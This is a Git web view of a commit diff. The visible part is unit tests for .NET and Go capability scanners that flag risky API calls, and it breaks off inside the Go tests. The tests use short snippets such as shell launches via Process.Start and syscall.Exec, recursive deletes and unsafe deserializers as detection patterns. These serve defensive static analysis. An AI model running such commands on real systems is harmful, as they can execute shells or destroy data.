stella-ops.org/git.stella-ops.org
1
0
Fork 0
Code Issues Pull Requests Actions 2 Releases Wiki Activity

feat: Implement Wine CSP HTTP provider for GOST cryptographic operations
Some checks failed
AOC Guard CI / aoc-guard (push) Has been cancelled
Details
AOC Guard CI / aoc-verify (push) Has been cancelled
Details
Docs CI / lint-and-preview (push) Has been cancelled
Details
Scanner Analyzers / Discover Analyzers (push) Has been cancelled
Details
Scanner Analyzers / Build Analyzers (push) Has been cancelled
Details
Scanner Analyzers / Test Language Analyzers (push) Has been cancelled
Details
Scanner Analyzers / Validate Test Fixtures (push) Has been cancelled
Details
Scanner Analyzers / Verify Deterministic Output (push) Has been cancelled
Details
Signals CI & Image / signals-ci (push) Has been cancelled
Details

Browse Source 
- Added WineCspHttpProvider class to interface with Wine-hosted CryptoPro CSP.
- Implemented ICryptoProvider, ICryptoProviderDiagnostics, and IDisposable interfaces.
- Introduced WineCspHttpSigner and WineCspHttpHasher for signing and hashing operations.
- Created WineCspProviderOptions for configuration settings including service URL and key options.
- Developed CryptoProGostSigningService to handle GOST signing operations and key management.
- Implemented HTTP service for the Wine CSP with endpoints for signing, verification, and hashing.
- Added Swagger documentation for API endpoints.
- Included health checks and error handling for service availability.
- Established DTOs for request and response models in the service.
This commit is contained in:
StellaOps Bot
2025-12-07 14:02:42 +02:00
parent 965cbf9574
commit bd2529502e
56 changed files with 9438 additions and 699 deletions
Download Patch File Download Diff File Expand all files Collapse all files

806
src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs Normal file
View File

@@ -0,0 +1,806 @@
using StellaOps.Scanner.Analyzers.Lang.DotNet.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.DotNet.Tests.Internal;
/// <summary>
/// Tests for <see cref="DotNetCapabilityScanner"/>.
/// </summary>
public sealed class DotNetCapabilityScannerTests
{
private const string TestFile = "Test.cs";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile(null!, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile("", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
namespace Test
{
public class Program
{
public static void Main() => Console.WriteLine(""Hello"");
}
}";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"Process.Start(""notepad.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, @"C:\src\Test.cs");
Assert.Single(result);
Assert.Equal("C:/src/Test.cs", result[0].SourceFile);
}
[Fact]
public void ScanFile_DeduplicatesSamePatternOnSameLine()
{
const string code = @"Process.Start(""cmd""); Process.Start(""notepad"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
// Same pattern on same line should be deduplicated
Assert.Single(result);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// Process.Start(""cmd"");
public void Method() { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
Process.Start(""cmd"");
File.Delete(""file.txt"");
*/
public void Method() { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsProcessStart()
{
const string code = @"Process.Start(""notepad.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("Process.Start", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsNewProcessStartInfo()
{
const string code = @"var psi = new ProcessStartInfo(""cmd.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessStartInfo", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessStartInfoObjectInitializer()
{
const string code = @"var psi = new ProcessStartInfo { FileName = ""cmd.exe"" };";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsUseShellExecuteTrue()
{
const string code = @"psi.UseShellExecute = true;";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("UseShellExecute=true", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsFileReadAllText()
{
const string code = @"var content = File.ReadAllText(""file.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileWriteAllText()
{
const string code = @"File.WriteAllText(""file.txt"", content);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFileDelete()
{
const string code = @"File.Delete(""file.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory.Delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDirectoryDelete()
{
const string code = @"Directory.Delete(""dir"", true);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory.Delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileCopy()
{
const string code = @"File.Copy(""src.txt"", ""dest.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory operations", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewFileStream()
{
const string code = @"using var fs = new FileStream(""file.bin"", FileMode.Open);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileStream", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSetAccessControl()
{
const string code = @"fileInfo.SetAccessControl(security);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("SetAccessControl", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNewHttpClient()
{
const string code = @"using var client = new HttpClient();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGetAsync()
{
const string code = @"var response = await client.GetAsync(url);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewWebClient()
{
const string code = @"using var client = new WebClient();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewSocket()
{
const string code = @"var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket/TcpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewTcpClient()
{
const string code = @"var tcp = new TcpClient(""localhost"", 8080);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket/TcpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWebRequestCreate()
{
const string code = @"var request = WebRequest.Create(url);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebRequest", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsEnvironmentGetEnvironmentVariable()
{
const string code = @"var path = Environment.GetEnvironmentVariable(""PATH"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.GetEnvironmentVariable", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsEnvironmentSetEnvironmentVariable()
{
const string code = @"Environment.SetEnvironmentVariable(""MY_VAR"", ""value"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.SetEnvironmentVariable", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsEnvironmentGetEnvironmentVariables()
{
const string code = @"var envVars = Environment.GetEnvironmentVariables();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.GetEnvironmentVariables", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns (Critical for deserialization attacks)
[Fact]
public void ScanFile_DetectsBinaryFormatter()
{
const string code = @"var formatter = new BinaryFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("BinaryFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsObjectStateFormatter()
{
const string code = @"var formatter = new ObjectStateFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("ObjectStateFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNetDataContractSerializer()
{
const string code = @"var serializer = new NetDataContractSerializer();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("NetDataContractSerializer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsLosFormatter()
{
const string code = @"var formatter = new LosFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("LosFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSoapFormatter()
{
const string code = @"var formatter = new SoapFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("SoapFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDataContractSerializer()
{
const string code = @"var serializer = new DataContractSerializer(typeof(MyClass));";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("DataContractSerializer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJsonDeserialize()
{
const string code = @"var obj = JsonSerializer.Deserialize<MyClass>(json);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("JsonSerializer.Deserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsAesCreate()
{
const string code = @"using var aes = Aes.Create();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Cryptography", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRsaCreate()
{
const string code = @"using var rsa = RSA.Create();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Asymmetric crypto", result[0].Pattern);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsNewSqlConnection()
{
const string code = @"using var conn = new SqlConnection(connectionString);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SqlConnection", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewSqlCommand()
{
const string code = @"var cmd = new SqlCommand(""SELECT * FROM Users"", conn);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SqlCommand", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsExecuteNonQuery()
{
const string code = @"cmd.ExecuteNonQuery();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Execute*", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsExecuteReader()
{
const string code = @"using var reader = cmd.ExecuteReader();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsDynamicMethod()
{
const string code = @"var dm = new DynamicMethod(""Test"", typeof(int), null);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("DynamicMethod", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsILGenerator()
{
const string code = @"var il = dm.GetILGenerator();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("ILGenerator", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCSharpScript()
{
const string code = @"var result = await CSharpScript.EvaluateAsync(code);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("CSharpScript", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsTypeBuilder()
{
const string code = @"var tb = mb.DefineType(""MyType"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
// TypeBuilder check expects "TypeBuilder" in the line
Assert.Empty(result); // DefineType doesn't match TypeBuilder pattern
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsAssemblyLoad()
{
const string code = @"var assembly = Assembly.Load(""MyAssembly"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Assembly.Load", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsAssemblyLoadFrom()
{
const string code = @"var assembly = Assembly.LoadFrom(""plugin.dll"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Assembly.Load", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsAssemblyLoadFile()
{
const string code = @"var assembly = Assembly.LoadFile(path);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsTypeInvokeMember()
{
const string code = @"type.InvokeMember(""Method"", BindingFlags.InvokeMethod, null, obj, args);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Type.InvokeMember", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsActivatorCreateInstance()
{
const string code = @"var obj = Activator.CreateInstance(type);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Activator.CreateInstance", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsDllImport()
{
const string code = @"[DllImport(""kernel32.dll"")]";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("DllImport", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsLibraryImport()
{
const string code = @"[LibraryImport(""user32.dll"")]";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("LibraryImport", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMarshalPtrToStructure()
{
const string code = @"var obj = Marshal.PtrToStructure<MyStruct>(ptr);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Marshal operations", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsMarshalAllocHGlobal()
{
const string code = @"var ptr = Marshal.AllocHGlobal(size);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsNativeLibraryLoad()
{
const string code = @"var lib = NativeLibrary.Load(""mylib.dll"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("NativeLibrary.Load", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsIntPtrOperations()
{
const string code = @"var ptr = new IntPtr(address);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("IntPtr operations", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Unsafe Patterns
[Fact]
public void ScanFile_DetectsUnsafeBlock()
{
const string code = @"unsafe { var ptr = &value; }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("unsafe block", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFixedStatement()
{
const string code = @"fixed (byte* ptr = array) { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("fixed statement", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsStackalloc()
{
const string code = @"Span<byte> buffer = stackalloc byte[256];";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("stackalloc", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region DotNetCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start");
Assert.Equal("Exec|Test.cs|10|Process.Start", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new DotNetCapabilityEvidence(
CapabilityKind.Exec, "Test.cs", 1, "pattern",
confidence: 2.0f);
var evidence2 = new DotNetCapabilityEvidence(
CapabilityKind.Exec, "Test.cs", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start",
snippet: "Process.Start(\"cmd.exe\");",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("Test.cs:10", metadata["capability.source"]);
Assert.Equal("Process.Start", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("Process.Start", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("Test.cs", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:Process.Start", langEvidence.Value);
}
#endregion
}

766
src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Go.Tests/Internal/GoCapabilityScannerTests.cs Normal file
View File

@@ -0,0 +1,766 @@
using StellaOps.Scanner.Analyzers.Lang.Go.Internal;
namespace StellaOps.Scanner.Analyzers.Lang.Go.Tests.Internal;
/// <summary>
/// Tests for <see cref="GoCapabilityScanner"/>.
/// </summary>
public sealed class GoCapabilityScannerTests
{
private const string TestFile = "test.go";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile(null!, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile("", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = GoCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
package main
func main() {
x := 1 + 2
println(x)
}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"cmd := exec.Command(""ls"")";
var result = GoCapabilityScanner.ScanFile(code, @"C:\test\file.go");
Assert.Single(result);
Assert.Equal("C:/test/file.go", result[0].SourceFile);
}
[Fact]
public void ScanFile_DeduplicatesSamePattern()
{
const string code = @"
exec.Command(""ls"")
exec.Command(""pwd"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
// Two different lines = two evidences
Assert.Equal(2, result.Count);
}
[Fact]
public void ScanFile_SortsByFileLineThenKind()
{
const string code = @"
os.Getenv(""PATH"")
exec.Command(""ls"")
os.Open(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.True(result.Count >= 3);
for (int i = 1; i < result.Count; i++)
{
Assert.True(
result[i - 1].SourceLine < result[i].SourceLine ||
(result[i - 1].SourceLine == result[i].SourceLine &&
result[i - 1].Kind <= result[i].Kind));
}
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
package main
// exec.Command(""ls"") - this is a comment
func main() {}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
package main
/*
exec.Command(""ls"")
os.Remove(""file"")
*/
func main() {}";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsExecCommand()
{
const string code = @"cmd := exec.Command(""ls"", ""-la"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("exec.Command", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsExecCommandContext()
{
const string code = @"cmd := exec.CommandContext(ctx, ""ls"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("exec.Command", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallExec()
{
const string code = @"syscall.Exec(""/bin/sh"", args, env)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("syscall.Exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallForkExec()
{
const string code = @"syscall.ForkExec(""/bin/sh"", args, nil)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("syscall.Exec", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsStartProcess()
{
const string code = @"os.StartProcess(""/bin/ls"", []string{}, &attr)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("os.StartProcess", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsOsCreate()
{
const string code = @"f, err := os.Create(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Open/Create", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsOpen()
{
const string code = @"f, err := os.Open(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Open/Create", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsOpenFile()
{
const string code = @"f, err := os.OpenFile(""file.txt"", os.O_RDWR, 0644)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsOsRemove()
{
const string code = @"os.Remove(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsRemoveAll()
{
const string code = @"os.RemoveAll(""/tmp/dir"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsChmod()
{
